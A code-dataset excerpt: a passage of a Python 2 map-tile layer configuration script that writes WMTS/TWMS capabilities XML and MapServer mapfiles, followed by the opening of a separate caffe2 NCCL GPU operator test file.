<TileMatrixSetLink>
<TileMatrixSet>$TileMatrixSet</TileMatrixSet>$TMSLimits
</TileMatrixSetLink>
<ResourceURL format="$Format" resourceType="tile" template="$WMTSServiceURL$Identifier/default/{Time}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.$FileType"/>
</Layer>"""
layer_output = ""
lines = wmts_layer_template.splitlines(True)
for line in lines:
# replace lines in template
if '<Layer>' in line:
line = ' ' + line
if '</Layer>' in line:
line = ' ' + line + '\n'
if '$Title' in line:
line = line.replace("$Title", title)
if '$BoundingBox' in line:
line = line.replace("$BoundingBox", projection.bbox_xml)
if '$Identifier' in line:
line = line.replace("$Identifier", identifier)
if '$LegendURL_vertical' in line:
line = line.replace("$LegendURL_vertical", legendUrl_svg_v_meta)
if '$LegendURL_horizontal' in line:
line = line.replace("$LegendURL_horizontal", legendUrl_svg_h_meta)
if '$ColorMap' in line:
if colormaps == None or default_colormap == None:
line = ''
else:
line_template = line
# First create line for default colormap
if default_colormap.attributes['url'].value != '':
default_colormap_url = add_trailing_slash(
default_colormap.attributes['url'].
value) + default_colormap.firstChild.nodeValue
else:
default_colormap_url = default_colormap.firstChild.nodeValue
line = line.replace("$MapVersion", '')
line = line.replace("$ColorMap", default_colormap_url)
# Add rest of tags
if default_colormap.attributes['version'].value != '':
for colormap in colormaps:
if colormap.attributes['url'].value != '':
colormap_url = add_trailing_slash(
colormap.attributes['url'].
value) + colormap.firstChild.nodeValue
else:
colormap_url = colormap.firstChild.nodeValue
newline = line_template.replace(
"$MapVersion",
'/' + colormap.attributes['version'].value)
newline = newline.replace("$ColorMap",
colormap_url)
line += newline[3:]
if '$VectorStyleJSON' in line:
if stylejsons == None or default_stylejson == None:
line = ''
else:
line_template = line
# First create line for default style
if default_stylejson.attributes['url'].value != '':
default_stylejson_url = add_trailing_slash(
default_stylejson.attributes['url'].
value) + default_stylejson.firstChild.nodeValue
else:
default_stylejson_url = default_stylejson.firstChild.nodeValue
line = line.replace("$MapVersion", '')
line = line.replace("$VectorStyleJSON", default_stylejson_url)
# Add rest of tags
if default_stylejson.attributes['version'].value != '':
for stylejson in stylejsons:
if stylejson.attributes['url'].value != '':
stylejson_url = add_trailing_slash(
stylejson.attributes['url'].
value) + stylejson.firstChild.nodeValue
else:
stylejson_url = stylejson.firstChild.nodeValue
newline = line_template.replace(
"$MapVersion",
'/' + stylejson.attributes['version'].value)
newline = newline.replace("$VectorStyleJSON",
stylejson_url)
line += newline[3:]
if '$VectorMetadataJSON' in line:
if metadatajsons == None or default_metadatajson == None:
line = ''
else:
line_template = line
# First create line for default metadata
if default_metadatajson.attributes['url'].value != '':
default_metadatajson_url = add_trailing_slash(
default_metadatajson.attributes['url'].
value) + default_metadatajson.firstChild.nodeValue
else:
default_metadatajson_url = default_metadatajson.firstChild.nodeValue
line = line.replace("$MapVersion", '')
line = line.replace("$VectorMetadataJSON",
default_metadatajson_url)
# Add rest of tags
if default_metadatajson.attributes['version'].value != '':
for metadatajson in metadatajsons:
if metadatajson.attributes['url'].value != '':
metadatajson_url = add_trailing_slash(
metadatajson.attributes['url'].
value) + metadatajson.firstChild.nodeValue
else:
metadatajson_url = metadatajson.firstChild.nodeValue
newline = line_template.replace(
"$MapVersion",
'/' + metadatajson.attributes['version'].value)
newline = newline.replace("$VectorMetadataJSON",
metadatajson_url)
line += newline[3:]
if '$Format' in line:
line = line.replace("$Format", mrf_format)
if '$FileType' in line:
if mrf_format == "application/vnd.mapbox-vector-tile":
line = line.replace("$FileType", "mvt")
else:
line = line.replace("$FileType", mrf_format.split('/')[1])
if '$WMTSServiceURL' in line:
line = line.replace("$WMTSServiceURL",
environment.wmtsServiceUrl)
if '$TileMatrixSet' in line:
line = line.replace("$TileMatrixSet", tilematrixset)
if tmsLimits:
line = line.replace('$TMSLimits', tmsLimits.toxml())
else:
line = line.replace('$TMSLimits', '')
tilematrixset_line = line
if static == True or len(detected_times) == 0:
if any(x in line for x in [
'Dimension', '<ows:Identifier>Time</ows:Identifier>',
'<ows:UOM>ISO8601</ows:UOM>', '$DefaultDate',
'<Current>false</Current>', '$DateRange'
]):
line = ''
if '/{Time}' in line:
line = line.replace('/{Time}', '')
else:
if '$DefaultDate' in line:
defaultDate = ''
for detected_time in detected_times:
defaultDate = detected_time.strip().split('/')[1]
line = line.replace("$DefaultDate", defaultDate)
if '$DateRange' in line:
line = line.replace("$DateRange", detected_times[0].strip())
iterTime = iter(detected_times)
next(iterTime)
for detected_time in iterTime:
line += " <Value>" + detected_time + "</Value>\n"
# remove extra white space from lines
line = line[3:]
layer_output = layer_output + line
# Replace extra lines before </Style>
blanks = """
"""
layer_output = layer_output.replace(blanks, "")
# Check if additional encoded style is needed
if is_encoded == True:
style_encoded = """</Style>
<Style isDefault="false">
<ows:Title xml:lang=\"en\">encoded</ows:Title>
<ows:Identifier>encoded</ows:Identifier>
</Style>"""
layer_output = layer_output.replace("</Style>", style_encoded)
layer_xml.writelines(layer_output)
# special case, add additional tilematrixsets from existing file and then remove
existing_layer_xml_filename = wmts_mrf_filename.replace(
'.mrf', '.xml').replace("_" + tilematrixset, '')
if tilematrixset in wmts_mrf_filename:
try:
# Open GetCapabilities.
existing_layer_xml = open(existing_layer_xml_filename, 'r+')
lines = existing_layer_xml.readlines()
os.remove(existing_layer_xml_filename)
for idx in range(0, len(lines)):
if '<TileMatrixSet>' in lines[idx]:
lines[idx] = lines[idx] + tilematrixset_line
layer_xml.seek(0)
layer_xml.writelines(lines)
existing_layer_xml.close()
except:
mssg = str().join([
'Cannot read existing layer XML file: ',
existing_layer_xml_filename
])
log_sig_err(mssg, sigevent_url)
# close new file
layer_xml.close()
# create TWMS layer metadata for GetCapabilities
if not no_twms and vectorType is None:
try:
# Open layer XML file
layer_xml = open(twms_mrf_filename.replace('.mrf', '_gc.xml'), 'w+')
except IOError:
mssg = str().join([
'Cannot read layer XML file: ',
twms_mrf_filename.replace('.mrf', '_gc.xml')
])
log_sig_exit('ERROR', mssg, sigevent_url)
TWMS_GC_LAYER_TEMPLATE = """ <Layer queryable=\"0\">
<Name>{Identifier}</Name>
<Title xml:lang=\"en\">{Title}</Title>
<Abstract xml:lang=\"en\">{Abstract}</Abstract>
<LatLonBoundingBox minx=\"{minx}\" miny=\"{miny}\" maxx=\"{maxx}\" maxy=\"{maxy}\" />
<Style>
<Name>default</Name>
<Title xml:lang=\"en\">(default) Default style</Title>
</Style>
<ScaleHint min=\"10\" max=\"100\"/>
<MinScaleDenominator>100</MinScaleDenominator>
</Layer>
"""
layer_output = bulk_replace(TWMS_GC_LAYER_TEMPLATE, [('{Identifier}', identifier),
('{Title}', title),
('{Abstract}', abstract),
('{minx}', projection.lowercorner[0]),
('{miny}', projection.lowercorner[1]),
('{maxx}', projection.uppercorner[0]),
('{maxy}', projection.uppercorner[1])])
layer_xml.writelines(layer_output)
layer_xml.close()
# create TWMS layer metadata for GetTileService
if not no_twms and vectorType is None:
TWMS_GTS_LAYER_TEMPLATE = """<TiledGroup>
<Name>{TiledGroupName}</Name>
<Title xml:lang=\"en\">{Title}</Title>
<Abstract xml:lang=\"en\">{Abstract}</Abstract>
<Projection>{Projection}</Projection>
<Pad>0</Pad>
<Bands>{Bands}</Bands>
<LatLonBoundingBox minx=\"{minx}\" miny=\"{miny}\" maxx=\"{maxx}\" maxy=\"{maxy}\" />
<Key>${time}</Key>
{Patterns}</TiledGroup>
"""
patterns = ""
cmd = depth + '/oe_create_cache_config -p ' + twms_mrf_filename
try:
print '\nRunning command: ' + cmd
process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
process.wait()
for output in process.stdout:
patterns = patterns + output
except:
log_sig_err("Error running command " + cmd, sigevent_url)
layer_output = bulk_replace(TWMS_GTS_LAYER_TEMPLATE, [('{TiledGroupName}', tiledGroupName),
('{Title}', title),
('{Abstract}', abstract),
('{Projection}', projection.wkt),
('{Bands}', "4" if mrf_format == 'image/png' else bands),
('{minx}', projection.lowercorner[0]),
('{miny}', projection.lowercorner[1]),
('{maxx}', projection.uppercorner[0]),
('{maxy}', projection.uppercorner[1]),
('{Patterns}', patterns)])
# Write out the GTS XML file
try:
layer_xml = open(twms_mrf_filename.replace('.mrf', '_gts.xml'), 'w+')
layer_xml.writelines(layer_output)
layer_xml.close()
except IOError:
mssg = str().join(['Cannot read layer XML file: ', twms_mrf_filename.replace('.mrf', '_gts.xml') ])
log_sig_exit('ERROR', mssg, sigevent_url)
# Create mapfile if requested and this is not a vector tile product
if create_mapfile and compression != "MVT" and environment.mapfileStagingLocation is not None:
# This block of code will check to see if we can just reuse an existing mapfile generated during the reproject
# configuration. The reproject WMTS-sourced configuration is better, as it handles time snapping correctly.
#
# However, for now we are turning this feature off as there are implications regarding performance that need
# additional testing.
#
# Note: oe_configure_remote_layers generates its own mapfiles based on the include/exclude rules and those should
# be mutually exclusive with the layers configured here.
reuse_wm_mapfiles = False
mapfile_name = os.path.join(environment.mapfileStagingLocation, identifier + '.map')
wm_layer_mapfile = os.path.join(environment.mapfileStagingLocation[:-5] + '3857', identifier + '.map')
if reuse_wm_mapfiles and os.path.exists(wm_layer_mapfile) and projection.id != 'EPSG:3857' and mapfile_name != wm_layer_mapfile:
# Vector layers will be ignored as they aren't reprojected
print('Found, and using, existing reproject mapfile ' + wm_layer_mapfile)
print('Copying to ' + mapfile_name)
shutil.copyfile(wm_layer_mapfile, mapfile_name)
elif wmsSourceLoc == "Remote":
# Use the template to create the new Mapfile snippet
wms_layer_group_info = ''
dimension_info = ''
validation_info = ''
style_info = ''
if wmsLayerGroupName is not None:
wms_layer_group_info = bulk_replace(WMS_LAYER_GROUP_TEMPLATE,
[('{wms_layer_group}', wmsLayerGroupName)])
if not static and len(detected_times) > 0:
defaultDateTime = ''
timeExtent = ''
for detected_time in detected_times:
defaultDateTime = detected_time.strip().split('/')[1]
timeExtent = timeExtent + detected_time.strip() + ","
dimension_info = bulk_replace(DIMENSION_TEMPLATE, [('{periods}', timeExtent.rstrip(',')),
('{default}', defaultDateTime)])
validation_info = VALIDATION_TEMPLATE.replace('{default}', defaultDateTime)
if legend and legendUrl_png_h_url:
style_info = bulk_replace(STYLE_TEMPLATE, [('{width}', str(legendUrl_png_h_width)),
('{height}', str(legendUrl_png_h_height)),
('{href}', legendUrl_png_h_url)])
src_epsg_code = str(projection.id.lower().split(":")[1])
target_bbox = [projection.lowercorner[0], projection.lowercorner[1],
projection.uppercorner[0], projection.uppercorner[1]]
resource_url_template = "$WMTSServiceURL$Identifier/default/{Time}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.$FileType"
template_string = bulk_replace(resource_url_template,
[('$WMTSServiceURL', environment.wmtsServiceUrl),
('$Identifier', identifier),
('$FileType', mrf_format.split('/')[1])])
mapfile_snippet = bulk_replace(
MAPFILE_TEMPLATE,
[('{layer_name}', identifier),
('{data_xml}', make_gdal_tms_xml(None, (4 if mrf_format == 'image/png' else 3), src_epsg_code,
tms=tilematrixset, template_string=template_string)),
('{layer_title}', cgi.escape(title)),
('{wms_layer_group_info}', wms_layer_group_info), ('{dimension_info}', dimension_info),
('{style_info}', style_info), ('{validation_info}', validation_info),
('{src_epsg}', src_epsg_code), ('{target_epsg}', src_epsg_code),
('{target_bbox}', ' '.join(target_bbox))])
if os.path.exists(mapfile_name):
# Warn that we're overwriting a recently modified file
last_mod = os.path.getmtime(mapfile_name)
if tm() - last_mod <= 600:
log_sig_warn("Overwriting layer mapfile " + mapfile_name, sigevent_url)
with open(mapfile_name, 'w+') as mapfile:
mapfile.write(mapfile_snippet)
else: # Create custom layer mapfile with time metadata elements
# Write mapfile info for layer
if os.path.exists(mapfile_name):
# Warn that we're overwriting a recently modified file
last_mod = os.path.getmtime(mapfile_name)
if tm() - last_mod <= 600:
log_sig_warn("Overwriting layer mapfile " + mapfile_name, sigevent_url)
with open(mapfile_name, 'w+') as mapfile:
# Initialize validation values
timeDirPattern = "%" + identifier + "_TIME%_" if not subdaily else "%" + identifier + "_TIME%"
timeParamRegex = '"^([0-9]|T){7}$"'
yearDirPattern = "%" + identifier + "_YEAR%"
yearDirRegex = '"^([0-9]|Y){4}$"'
subdailyDirPattern = "%" + identifier + "_SUBDAILY%_"
subdailyParamRegex = '"^([0-9]|T){6}$"'
minx = projection.lowercorner[0]
miny = projection.lowercorner[1]
maxx = projection.uppercorner[0]
maxy = projection.uppercorner[1]
# Write mapfile lines
mapfile.write("LAYER\n")
mapfile.write("\tNAME\t\"" + identifier + "\"\n")
# If we're grouping layers together... (This is not the hierarchical wms_layer_group)
if wmsGroupName:
# The default time/year needs to be empty because the DATA pattern will contain variables
# for both this layer _and_ its group. If not "", then you get path elements like "YYYY2020"
default_time = ""
default_year = ""
default_subdaily = ""
timeDirPattern = ("%" + wmsGroupName + "_TIME%") + timeDirPattern
yearDirPattern = yearDirPattern + "%" + wmsGroupName + "_YEAR%"
else:
default_time = "TTTTTTT"
default_year = "YYYY"
default_subdaily = "TTTTTT"
if vectorType:
layer_type = vectorType.upper()
else:
layer_type = 'RASTER'
mapfile.write("\tTYPE\t" + layer_type + "\n")
mapfile.write("\tSTATUS\tON\n")
mapfile.write("\tVALIDATION\n")
# The validation was previously being put in the layer METADATA -- deprecated in Mapserver 5.4.0
if not static:
mapfile.write("\t\t\"default_" + identifier + "_TIME\"\t\t\"" + default_time + "\"\n")
mapfile.write("\t\t\"" + identifier + "_TIME\"\t\t\t" + timeParamRegex + "\n")
if wmsGroupName:
mapfile.write("\t\t\"default_" + wmsGroupName + "_TIME\"\t\t\"" + default_time + "\"\n")
mapfile.write("\t\t\"" + wmsGroupName + "_TIME\"\t\t\t" + timeParamRegex + "\n")
if not static and year:
mapfile.write("\t\t\"default_" + identifier + "_YEAR\"\t\"" + default_year + "\"\n")
mapfile.write("\t\t\"" + identifier + "_YEAR\"\t\t" + yearDirRegex + "\n")
if wmsGroupName:
mapfile.write("\t\t\"default_" + wmsGroupName + "_YEAR\"\t\"" + default_year + "\"\n")
mapfile.write("\t\t\"" + wmsGroupName + "_YEAR\"\t\t" + yearDirRegex + "\n")
if not static and subdaily:
mapfile.write("\t\t\"default_" + identifier + "_SUBDAILY\"\t\"" + default_subdaily + "\"\n")
mapfile.write("\t\t\"" + identifier + "_SUBDAILY\"\t\t" + subdailyParamRegex + "\n")
if wmsGroupName:
mapfile.write("\t\t\"default_" + wmsGroupName + "_SUBDAILY\"\t\"" + default_subdaily + "\"\n")
mapfile.write("\t\t\"" + wmsGroupName + "_SUBDAILY\"\t\t" + subdailyParamRegex + "\n")
mapfile.write("\tEND\n")
mapfile.write("\tMETADATA\n")
mapfile.write("\t\t\"wms_title\"\t\t\"" + title + "\"\n")
mapfile.write("\t\t\"wms_extent\"\t\t\"" + minx + " " + miny + " " + maxx + " " + maxy + "\"\n")
if not static and len(detected_times) > 0:
defaultDate = ''
timeExtent = ''
for detected_time in detected_times:
defaultDate = detected_time.strip().split('/')[1]
timeExtent = timeExtent + detected_time.strip() + ","
mapfile.write("\t\t\"wms_timeextent\"\t\"" + timeExtent.rstrip(',') + "\"\n")
mapfile.write("\t\t\"wms_timedefault\"\t\"" + defaultDate + "\"\n")
if wmsLayerGroupName is not None:
if wmsGroupName is not None:
wmsLayerGroupName += "/" + wmsGroupName
mapfile.write("\t\t\"wms_layer_group\"\t\"" + wmsLayerGroupName + "\"\n")
elif wmsGroupName is not None:
mapfile.write("\t\t\"wms_layer_group\"\t\t\"" + wmsGroupName + "\"\n")
if legend and legendUrl_png_h_url:
mapfile.write("\t\t\"wms_style\"\t\t\t\t\"default\"\n")
mapfile.write("\t\t\"wms_style_default_legendurl_width\"\t\"" + str(legendUrl_png_h_width) + "\"\n")
mapfile.write("\t\t\"wms_style_default_legendurl_height\"\t\"" + str(legendUrl_png_h_height) + "\"\n")
mapfile.write("\t\t\"wms_style_default_legendurl_format\"\t\"image/png\"\n")
mapfile.write("\t\t\"wms_style_default_legendurl_href\"\t\"" + legendUrl_png_h_url + "\"\n")
if vectorType:
mapfile.write('\t\t"wms_enable_request"\t\t"GetLegendGraphic"\n')
mapfile.write('\t\t"wfs_getfeature_formatlist"\t\t"geojson,csv"\n')
mapfile.write('\t\t"gml_include_items"\t\t"all"\n')
mapfile.write("\tEND\n")
datacon = "DATA"
if vectorType:
# check if we have json files; if yes, use that extension, otherwise assume shapefiles
jsonsearch = archiveLocation + '/[0-9]*/*.json'
if len(glob.glob(jsonsearch)) == 0:
extension = ''
else:
extension = '.json'
mapfile.write("\tCONNECTIONTYPE OGR\n")
datacon = "CONNECTION"
else:
extension = '.mrf'
if not static and year:
if subdaily:
mapfile.write("\t"+datacon+"\t\"" + archiveLocation + "/" +
yearDirPattern + "/" + fileNamePrefix +
timeDirPattern + subdailyDirPattern +
extension + "\"\n")
else:
mapfile.write("\t"+datacon+"\t\"" + archiveLocation + "/" +
yearDirPattern + "/" + fileNamePrefix +
timeDirPattern + extension + "\"\n")
elif not static and not year:
mapfile.write("\t"+datacon+"\t\"" + archiveLocation + "/" +
fileNamePrefix + timeDirPattern + extension +
"\"\n")
else:
mapfile.write("\t"+datacon+"\t\"" + archiveLocation + "/" +
fileNamePrefix + extension + "\"\n")
mapfile.write("\tPROJECTION\n")
mapfile.write('\t\t\"init={0}"\n'.format(projection.id.lower()))
mapfile.write("\tEND\n")
if vectorType and mapfileLayerContents:
try:
with open(mapfileLayerContents, 'r') as f:
mapfile.write(f.read())
mapfile.write("\n")
except:
log_sig_err(
"Couldn't read mapfile LAYER contents file: " +
mapfileLayerContents, sigevent_url)
mapfile.write("END\n")
# Use config filename or directory for logging the current config outside of loop
if not options.layer_config_filename:
current_conf = configuration_directory
else:
current_conf = configuration_filename
# run scripts
if no_twms == False:
for key, twms_endpoint in twms_endpoints.iteritems():
#twms
if twms_endpoint.cacheConfigBasename:
print "\nRunning commands for endpoint: " + twms_endpoint.path
cmd = depth + '/oe_create_cache_config -cbd ' + twms_endpoint.path + " " + twms_endpoint.path + '/' + twms_endpoint.cacheConfigBasename + '.config'
run_command(cmd, sigevent_url)
cmd = depth + '/oe_create_cache_config -cxd ' + twms_endpoint.path + " " + twms_endpoint.path + '/' + twms_endpoint.cacheConfigBasename + '.xml'
run_command(cmd, sigevent_url)
if no_cache == False:
if twms_endpoint.cacheConfigLocation:
print '\nCopying: ' + twms_endpoint.path + '/' + twms_endpoint.cacheConfigBasename + '.config' + ' -> ' + twms_endpoint.cacheConfigLocation + '/' + twms_endpoint.cacheConfigBasename + '.config'
shutil.copyfile(
twms_endpoint.path + '/' +
twms_endpoint.cacheConfigBasename + '.config',
twms_endpoint.cacheConfigLocation + '/' +
twms_endpoint.cacheConfigBasename + '.config')
print '\nCopying: ' + twms_endpoint.path + '/' + twms_endpoint.cacheConfigBasename + '.xml' + ' -> ' + twms_endpoint.cacheConfigLocation + '/' + twms_endpoint.cacheConfigBasename + '.xml'
shutil.copyfile(
twms_endpoint.path + '/' +
twms_endpoint.cacheConfigBasename + '.xml',
twms_endpoint.cacheConfigLocation + '/' +
twms_endpoint.cacheConfigBasename + '.xml')
if twms_endpoint.getCapabilities:
# Add layer metadata to getCapabilities
layer_xml = ""
for xml_file in sorted(
os.listdir(twms_endpoint.path), key=lambda s: s.lower()):
if xml_file.endswith("_gc.xml") and xml_file != "getCapabilities.xml":
layer_xml = layer_xml + open(twms_endpoint.path + '/' + str(xml_file), 'r').read()
getCapabilities_file = twms_endpoint.path + '/getCapabilities.xml'
getCapabilities_base = open(getCapabilities_file, 'r+')
gc_lines = getCapabilities_base.readlines()
for idx in range(0, len(gc_lines)):
if "\t</Layer>" in gc_lines[idx]:
gc_lines[idx] = layer_xml + gc_lines[idx]
print '\nAdding layers to TWMS GetCapabilities'
getCapabilities_base.seek(0)
getCapabilities_base.truncate()
getCapabilities_base.writelines(gc_lines)
getCapabilities_base.close()
if no_xml == False:
if not os.path.exists(twms_endpoint.getCapabilities):
os.makedirs(twms_endpoint.getCapabilities)
print '\nCopying: ' + twms_endpoint.path + '/getCapabilities.xml' + ' -> ' + twms_endpoint.getCapabilities + '/getCapabilities.xml'
shutil.copyfile(
twms_endpoint.path + '/getCapabilities.xml',
twms_endpoint.getCapabilities + '/getCapabilities.xml')
if twms_endpoint.getTileService:
# Add layer metadata to getTileService
layer_xml = ""
for xml_file in sorted(os.listdir(twms_endpoint.path), key=lambda s: s.lower()):
if xml_file.endswith("_gts.xml") and xml_file != "getTileService.xml":
layer_xml = layer_xml + open(twms_endpoint.path + '/' + str(xml_file), 'r').read()
getTileService_file = twms_endpoint.path + '/getTileService.xml'
getTileService_base = open(getTileService_file, 'r+')
gc_lines = getTileService_base.readlines()
for idx in range(0, len(gc_lines)):
if "</TiledPatterns>" in gc_lines[idx]:
gc_lines[idx] = layer_xml + gc_lines[idx]
print '\nAdding layers to TWMS GetTileService'
getTileService_base.seek(0)
getTileService_base.truncate()
getTileService_base.writelines(gc_lines)
getTileService_base.close()
if no_xml == False:
if not os.path.exists(twms_endpoint.getTileService):
os.makedirs(twms_endpoint.getTileService)
print '\nCopying: ' + twms_endpoint.path + '/getTileService.xml' + ' -> ' + twms_endpoint.getTileService + '/getTileService.xml'
shutil.copyfile(
twms_endpoint.path + '/getTileService.xml',
twms_endpoint.getTileService + '/getTileService.xml')
if no_wmts == False:
for key, wmts_endpoint in wmts_endpoints.iteritems():
#wmts
if wmts_endpoint.cacheConfigBasename:
print "\nRunning commands for endpoint: " + wmts_endpoint.path
cmd = depth + '/oe_create_cache_config -cbd ' + wmts_endpoint.path + " " + wmts_endpoint.path + '/' + wmts_endpoint.cacheConfigBasename + '.config'
try:
run_command(cmd, sigevent_url)
except:
log_sig_err("Error in generating binary cache config using command: " + cmd, sigevent_url)
cmd = depth + '/oe_create_cache_config -cxd ' + wmts_endpoint.path + " " + wmts_endpoint.path + '/' + wmts_endpoint.cacheConfigBasename + '.xml'
try:
run_command(cmd, sigevent_url)
except:
log_sig_err(
"Error in generating XML cache config using command: " +
cmd, sigevent_url)
if no_cache == False:
if wmts_endpoint.cacheConfigLocation:
print '\nCopying: ' + wmts_endpoint.path + '/' + wmts_endpoint.cacheConfigBasename + '.config' + ' -> ' + wmts_endpoint.cacheConfigLocation + '/' + wmts_endpoint.cacheConfigBasename + '.config'
shutil.copyfile(
wmts_endpoint.path + '/' +
wmts_endpoint.cacheConfigBasename + '.config',
wmts_endpoint.cacheConfigLocation + '/' +
wmts_endpoint.cacheConfigBasename + '.config')
print '\nCopying: ' + wmts_endpoint.path + '/' + wmts_endpoint.cacheConfigBasename + '.xml' + ' -> ' + wmts_endpoint.cacheConfigLocation + '/' + wmts_endpoint.cacheConfigBasename + '.xml'
shutil.copyfile(
wmts_endpoint.path + '/' +
wmts_endpoint.cacheConfigBasename + '.xml',
wmts_endpoint.cacheConfigLocation + '/' +
wmts_endpoint.cacheConfigBasename + '.xml')
if wmts_endpoint.getCapabilities:
# Add layer metadata to getCapabilities
layer_xml = ""
for xml_file in sorted(
os.listdir(wmts_endpoint.path), key=lambda s: s.lower()):
if xml_file.endswith(
".xml") and xml_file != "getCapabilities.xml" and (
xml_file.startswith("cache") == False):
layer_xml = layer_xml + open(
wmts_endpoint.path + '/' + str(xml_file), 'r').read()
getCapabilities_file = wmts_endpoint.path + '/getCapabilities.xml'
try:
getCapabilities_base = open(getCapabilities_file, 'r+')
gc_lines = getCapabilities_base.readlines()
for idx in range(0, len(gc_lines)):
if "<Contents>" in gc_lines[idx]:
gc_lines[idx] = gc_lines[idx] + layer_xml
print '\nAdding layers to WMTS GetCapabilities'
if "</Contents>" in gc_lines[
idx] and " </TileMatrixSet>" not in gc_lines[idx -
1]:
gc_lines[
idx] = wmts_endpoint.projection.tilematrixset_xml[
2:] + '\n' + gc_lines[idx]
print "\nAdding TileMatrixSet to WMTS GetCapabilities"
getCapabilities_base.seek(0)
getCapabilities_base.truncate()
getCapabilities_base.writelines(gc_lines)
getCapabilities_base.close()
except:
log_sig_err(
"Couldn't read GetCapabilities file: " +
getCapabilities_file, sigevent_url)
if no_xml == False:
print '\nCopying: ' + getCapabilities_file + ' -> ' + wmts_endpoint.getCapabilities + '/getCapabilities.xml'
shutil.copyfile(
getCapabilities_file,
wmts_endpoint.getCapabilities + '/getCapabilities.xml')
if not os.path.exists(wmts_endpoint.getCapabilities +
'1.0.0/'):
os.makedirs(wmts_endpoint.getCapabilities + '1.0.0')
print '\nCopying: ' + getCapabilities_file + ' -> ' + wmts_endpoint.getCapabilities + '/1.0.0/WMTSCapabilities.xml'
shutil.copyfile(
getCapabilities_file, wmts_endpoint.getCapabilities +
'/1.0.0/WMTSCapabilities.xml')
# Create the consolidated mapfile based on the snippets created previously
if create_mapfile is True:
for key, wms_endpoint in wms_endpoints.iteritems():
if wms_endpoint.mapfileLocation is not None and wms_endpoint.mapfileStagingLocation is not None and wms_endpoint.mapfileConfigLocation is not None and wms_endpoint.mapfileConfigBasename is not None:
# Create a new staging mapfile and add header, layers, and footer
staging_mapfile = os.path.join(
wms_endpoint.mapfileStagingLocation,
wms_endpoint.mapfileLocationBasename)
output_mapfile = os.path.join(
wms_endpoint.mapfileLocation,
wms_endpoint.mapfileLocationBasename + ".map")
with open(staging_mapfile, 'w+') as mapfile:
# Append header to mapfile if there is one
mapfile_config_prefix = os.path.join(
wms_endpoint.mapfileConfigLocation,
wms_endpoint.mapfileConfigBasename)
try:
with open(mapfile_config_prefix + '.header',
'r') as header:
mapfile.write(header.read())
print "\nUsing mapfile header: " + header.name
except IOError:
pass
# Iterate through layer mapfile snippets
layers = [
os.path.join(wms_endpoint.mapfileStagingLocation, sfile)
for sfile in sorted(
os.listdir(wms_endpoint.mapfileStagingLocation),
key=unicode.lower) if sfile.endswith('.map') and
not sfile.startswith(wms_endpoint.mapfileLocationBasename)
]
for layer in layers:
with open(layer, 'r') as f:
mapfile.write('\n')
mapfile.write(f.read())
# Append footer to mapfile if there is one
try:
with open(mapfile_config_prefix + '.footer',
'r') as footer:
mapfile.write('\n')
mapfile.write(footer.read())
print "\nUsing mapfile footer: " + footer.name
except IOError:
mapfile.write('\nEND')
pass
print '\nCopying: Mapfile {0} to {1}'.format(
staging_mapfile, output_mapfile)
shutil.copyfile(staging_mapfile, output_mapfile)
else:
if wms_endpoint.mapfileLocation is None:
log_sig_err(
'Mapfile creation enabled but no <MapfileLocation> present in environment config file.',
sigevent_url)
if wms_endpoint.mapfileStagingLocation is None:
log_sig_err(
'Mapfile creation enabled but no <MapfileStagingLocation> present in environment config file.',
sigevent_url)
if wms_endpoint.mapfileConfigLocation is None:
log_sig_err(
'Mapfile creation enabled but no <MapfileConfigLocation> present in environment config file.',
sigevent_url)
if wms_endpoint.mapfileConfigBasename is None:
log_sig_err(
'Mapfile creation enabled but no "basename" attribute specified for <MapfileConfigLocation>.',
sigevent_url)
print '\n*** Layers have been configured successfully ***'
if no_cache == False:
print '\nThe Apache server must be restarted to reload the cache configurations\n'
if restart == True:
cmd = 'sudo apachectl stop'
try:
run_command(cmd, sigevent_url)
except Exception, e:
log_sig_err(str(e), sigevent_url)
cmd = 'sleep 3'
run_command(cmd, sigevent_url)
cmd = 'sudo apachectl start'
try:
run_command(cmd, sigevent_url)
except Exception, e:
log_sig_err(str(e), sigevent_url)
print '\nThe Apache server was restarted successfully'
completion = "The OnEarth Layer Configurator completed "
if len(warnings) > 0:
message = completion + "with warnings."
print "Warnings:"
for warning in warnings:
print warning
if len(errors) > 0:
message = completion + "with errors."
print "\nErrors:"
for error in errors:
print error
if len(warnings) == 0 and len(errors) == 0:
message = completion + "successully."
print ""
message = message + " " + (
"Cache configurations created.",
"Cache configurations staged.")[no_cache] + " " + (
"Server XML created", "Server XML staged")[no_xml] + "." + " " + (
"Apache not restarted",
"Apache restarted")[restart] + "." + " " + (
"Legends not generated",
"Legends generated")[legend] + "." + " " + (
"Archive links not generated",
"Archive links generated")[links] + ". " + (
"Mapfiles not configured", "Mapfiles configured"
)[create_mapfile] + "." + " Warnings: " + str(
len(warnings)) + ". Errors: " + str(len(errors)) + "."
try:
log_info_mssg(asctime() + " " + message)
sigevent('INFO', asctime() + " " + message, sigevent_url)
except urllib2.URLError:
None
log_info_mssg('Exiting oe_configure_layer.')
if len(errors) > 0:
sys.exit(len(errors))
else:
sys.exit(0)
|
[] |
[] |
[
"LCDIR"
] |
[]
|
["LCDIR"]
|
python
| 1 | 0 | |
venv/Lib/site-packages/caffe2/contrib/nccl/nccl_ops_test.py
|
import unittest
import hypothesis.strategies as st
from hypothesis import given, assume
import numpy as np
import time
import os
from caffe2.proto import caffe2_pb2
from caffe2.python import core, workspace, muji, dyndep
import caffe2.python.hypothesis_test_util as hu
np.random.seed(1)
dyndep.InitOpsLibrary('@/caffe2/caffe2/contrib/nccl:nccl_ops')
def gpu_device(i):
device_option = caffe2_pb2.DeviceOption()
device_option.device_type = workspace.GpuDeviceType
device_option.device_id = i
return device_option
def benchmark(ws, net, warmups=5, iters=100):
for _ in range(warmups):
ws.run(net)
plan = core.Plan("plan")
plan.AddStep(core.ExecutionStep("test-step", net, iters))
before = time.time()
ws.run(plan)
after = time.time()
print("Timing network, time taken per-iteration: {:.6f}ms".format((
after - before) / float(iters) * 1000.0))
return after - before
@unittest.skipIf(not workspace.has_cuda_support, "NCCL only on CUDA GPU")
class NCCLOpsTest(hu.HypothesisTestCase):
@given(n=st.integers(min_value=2, max_value=workspace.NumGpuDevices()),
m=st.integers(min_value=1, max_value=1000),
in_place=st.booleans())
def test_nccl_allreduce(self, n, m, in_place):
xs = [np.random.randn(m).astype(np.float32) for i in range(n)]
inputs = [str("x_{}".format(i)) for i in range(n)]
prefix = "" if in_place else "o"
